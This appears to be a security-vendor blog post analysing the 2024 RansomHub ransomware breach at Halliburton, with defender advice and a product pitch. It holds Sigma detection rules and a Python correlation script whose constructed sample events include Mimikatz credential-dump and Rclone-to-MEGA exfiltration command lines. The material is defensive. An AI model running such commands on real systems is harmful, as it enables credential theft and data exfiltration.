On August 21, 2024, Halliburton — the $23 billion oilfield services company that drills, fracks, and services wells across 70 countries — detected unauthorised access on its corporate network. Two days later, the company filed an SEC Form 8-K disclosing the cybersecurity incident, took portions of its IT environment offline, and began routing some customer-facing operations through manual workarounds. RansomHub, a ransomware-as-a-service crew that emerged in February 2024, ultimately claimed responsibility and listed Halliburton on its dark-web leak site. In Halliburton's November 5, 2024 Form 10-Q, the company disclosed $35 million in pre-tax expenses tied to the incident — a comparatively modest figure beside Change Healthcare's billions, but a useful reminder that energy-sector IT outages cascade into oilfield delays, customer billing freezes, and ESG-disclosure obligations.
Who is RansomHub?
RansomHub appeared on February 2, 2024 with a slick affiliate-recruitment post on the Russian-language RAMP forum, immediately offering affiliates a 90/10 split (in the affiliates' favour) and a Rust-based encryptor that targets Windows, Linux, ESXi, and FreeBSD. CISA Joint Advisory AA24-242A (August 29, 2024) tied RansomHub to over 210 victims in its first six months, picking up many ex-ALPHV/BlackCat and ex-LockBit affiliates orphaned by 2024 takedowns. RansomHub's tradecraft is unremarkable but effective: SocGholish or Atomic Stealer for initial access, ScreenConnect or AnyDesk for persistence, Mimikatz and Impacket for lateral movement, Rclone or MEGAcmd for exfiltration, and the Rust encryptor's x25519/ChaCha20 hybrid scheme (Curve25519 key agreement, ChaCha20 for the file data). Mandiant tracks the cluster as UNC4194.
How did they get into Halliburton?
Halliburton has not publicly described the entry vector. Open-source reporting (Bleeping Computer, August 28; SecurityWeek, August 29; CPO Magazine analysis) identifies two plausible pathways: a SocGholish drive-by download delivered as a fake Chrome update on a compromised oil-and-gas industry-news website, and exploitation of an internet-facing Halliburton VPN appliance. The latter is consistent with the TTPs in AA24-242A, which names CVE-2023-3519 (Citrix NetScaler), CVE-2023-27997 (Fortinet SSL-VPN), and CVE-2023-46805/CVE-2024-21887 (Ivanti Connect Secure) as preferred entry points. The advisory also notes that, from initial access, RansomHub affiliates typically reach domain admin within 6-9 hours using stolen Kerberos tickets and tooling such as SharpHound and BloodHound.
What did they steal?
Halliburton's Form 8-K/A filing on August 30, 2024 confirmed that "data has been taken from the company's systems." RansomHub posted a teaser on September 1 listing engineering schematics, customer reservoir-engineering reports, and pricing models. The leak-site listing (removed in late September, presumably once negotiations had concluded) referenced "sensitive blueprints and proprietary industrial data", language echoed in Halliburton's Form 10-Q. The 10-Q expressly states that the company has not paid a ransom, yet multiple media outlets reported that RansomHub took the listing down anyway, possibly because the data had lost commercial value or after FBI engagement.
How did business operations break?
Unlike a Colonial Pipeline-class OT incident, Halliburton's drilling and well-service field operations themselves continued. The damage was at the IT-business interface: customer invoicing was delayed (some clients reported 4-6 week billing windows), procurement systems on SAP S/4HANA were offline for portions of the recovery, and the company's PerformanceWell SaaS platform — used by E&P customers to share reservoir telemetry with Halliburton engineers — had segments of its API offline for nine business days. The Form 10-Q quantifies the impact at $0.02 per diluted share for Q3, mostly response costs (incident-response retainers, forensics, customer-notification operations) plus working-capital effects from delayed receivables.
How long was dwell time?
Halliburton has not disclosed first-seen indicators. Industry threat-intel reports place RansomHub's median dwell in 2024 between 6 and 14 days. Mandiant's M-Trends 2024, published April 23, 2024, put the broader ransomware-ecosystem median dwell at 13 days, down from 16 in 2023. Mandiant also noted that energy-sector dwell times skew shorter than average because OT-segmented IT networks offer fewer lateral-movement paths: attackers detonate sooner because there is less to discover.
Why does the energy-sector supply chain need to learn from this?
The $35 million figure understates the strategic risk. Halliburton's PerformanceWell and Landmark software platforms are deeply embedded in customer drilling decisions; ExxonMobil, Chevron, and Saudi Aramco depend on weekly data syncs. A multi-week PerformanceWell outage cascades into delayed casing-design decisions, postponed perforation jobs, and renegotiated rig contracts. Energy-sector SaaS is the new pipeline software, and CISA's 2024 Energy Sector Risk Profile (October 2024) explicitly warns that ransomware against oilfield-services providers is the new pre-positioning vector for sector-wide disruption.
# Detection: RansomHub TTPs observed at energy-sector victims (CISA AA24-242A)
```yaml
title: RansomHub Mimikatz Credential Dump
id: ransomhub-energy-2024-creds
logsource: {category: process_creation, product: windows}
detection:
  selection:
    Image|endswith: '\mimikatz.exe'
    CommandLine|contains: 'sekurlsa::logonpasswords'
  condition: selection
---
title: RansomHub Rclone Exfil to MEGA
id: ransomhub-energy-2024-exfil
logsource: {category: process_creation, product: windows}
detection:
  selection:
    Image|endswith: '\rclone.exe'
    CommandLine|contains: ['mega:', 'config']
  condition: selection
---
title: RansomHub Mimikatz + Rclone Exfil Sequence
id: ransomhub-energy-2024
correlation:
  type: temporal_ordered
  rules: [ransomhub-energy-2024-creds, ransomhub-energy-2024-exfil]
  group-by: [ComputerName]
  timespan: 48h
level: high
```
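The same dump-then-exfil sequencing, replayed over process-creation telemetry in Python as an added example that is not part of the original page or of the CISA advisory; the event lines, hostnames and paths are constructed, and the field names follow Sysmon conventions:

```python
"""Added example (not from the page or CISA): replays constructed Sysmon-style
process-creation events and raises the Mimikatz -> Rclone/MEGA sequence when
both occur on the same host within 48 hours, credential dump first."""
import json
from datetime import datetime, timedelta

WINDOW = timedelta(hours=48)

# Constructed sample telemetry (JSON lines, UTC timestamps); not real data.
SAMPLE_EVENTS = r"""
{"UtcTime":"2024-08-19T02:10:00","ComputerName":"HAL-WS042","Image":"C:\\Users\\svc\\mimikatz.exe","CommandLine":"mimikatz.exe privilege::debug sekurlsa::logonpasswords"}
{"UtcTime":"2024-08-19T03:45:00","ComputerName":"HAL-WS042","Image":"C:\\Tools\\rclone.exe","CommandLine":"rclone.exe copy D:\\Eng mega:dump --config C:\\Tools\\rclone.conf"}
{"UtcTime":"2024-08-10T09:00:00","ComputerName":"HAL-FS01","Image":"C:\\Temp\\mimikatz.exe","CommandLine":"mimikatz.exe sekurlsa::logonpasswords"}
{"UtcTime":"2024-08-15T09:00:00","ComputerName":"HAL-FS01","Image":"C:\\Temp\\rclone.exe","CommandLine":"rclone.exe sync E:\\Share mega:bk --config r.conf"}
{"UtcTime":"2024-08-20T11:00:00","ComputerName":"HAL-DB07","Image":"C:\\Temp\\rclone.exe","CommandLine":"rclone.exe copy C:\\Data mega:x --config r.conf"}
{"UtcTime":"2024-08-20T12:00:00","ComputerName":"HAL-DB07","Image":"C:\\Temp\\mimikatz.exe","CommandLine":"mimikatz.exe sekurlsa::logonpasswords"}
"""

def is_cred_dump(ev):
    """selection_creds: Sigma matching is case-insensitive, so lower-case."""
    return (ev["Image"].lower().endswith("\\mimikatz.exe")
            and "sekurlsa::logonpasswords" in ev["CommandLine"].lower())

def is_mega_exfil(ev):
    """selection_exfil: a Sigma value list under one field is OR-ed."""
    cl = ev["CommandLine"].lower()
    return (ev["Image"].lower().endswith("\\rclone.exe")
            and any(s in cl for s in ("mega:", "config")))

def correlate(jsonl, window=WINDOW):
    """Return [(host, dump_time, exfil_time)] for every host where a credential
    dump is followed by an Rclone/MEGA run within `window`."""
    events = sorted((json.loads(l) for l in jsonl.splitlines() if l.strip()),
                    key=lambda e: e["UtcTime"])
    last_dump = {}   # host -> time of the most recent credential dump
    alerts = []
    for ev in events:
        t, host = datetime.fromisoformat(ev["UtcTime"]), ev["ComputerName"]
        if is_cred_dump(ev):
            last_dump[host] = t
        # Exfil seen before any dump on that host, or more than `window`
        # after it, is not the sequence and stays silent.
        if is_mega_exfil(ev) and host in last_dump and t - last_dump[host] <= window:
            alerts.append((host, last_dump[host].isoformat(), t.isoformat()))
    return alerts

if __name__ == "__main__":
    for host, dumped, exfil in correlate(SAMPLE_EVENTS):
        print(f"ALERT {host}: dump {dumped} -> MEGA exfil {exfil}")
```

Of the three constructed hosts only HAL-WS042 alerts: HAL-FS01's exfil falls outside the window and HAL-DB07's Rclone run precedes its credential dump.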
What should energy-sector defenders do?
Five actions. First, treat customer-facing SaaS platforms (Landmark, PerformanceWell, OFS Portal) as critical infrastructure and require RTO commitments tighter than 72 hours. Second, eliminate flat IT environments: drilling-data backbones, billing platforms, and ESG-reporting systems must be segmented from corporate Active Directory. Third, audit every VPN appliance against the AA24-242A IOC list and the CISA KEV catalogue; CVE-2023-3519, CVE-2023-27997, and CVE-2024-21887 remain frequently unpatched in the sector. Fourth, require dual control for Active Directory tier-0 changes, since RansomHub's domain-admin pivot relies on single-operator privilege. Fifth, add explicit ransomware-recovery and material-cybersecurity-incident clauses (SEC Item 1.05) to supplier contracts; the SEC's December 2023 amended rule already requires four-business-day disclosure, but supplier obligations lag.
How Safeguard Helps
Safeguard maps energy-sector IT and OT-adjacent software supply chains and continuously cross-references components against CISA KEV, RansomHub TTP advisories (AA24-242A), and Mandiant UNC4194 reporting — so the moment a vendor like Halliburton, Schlumberger, or Baker Hughes is implicated, every customer can identify shared-component exposure in minutes. Griffin AI's reachability engine prioritises CVEs that are actually exploitable from corporate VLANs versus those isolated in offline drilling-data networks. TPRM scoring tracks each oilfield-services supplier against the CISA Secure by Design pledge, the DOE's Energy Threat Analysis Center reports, and SEC Item 1.05 disclosure cadence, downgrading vendors who fail to publish four-business-day notifications. Policy gates block any new energy-platform release that embeds a KEV-listed Citrix, Fortinet, or Ivanti component, and ingest VEX statements from device manufacturers so incident responders have a clean prioritised view during the next AA24-242A-class campaign.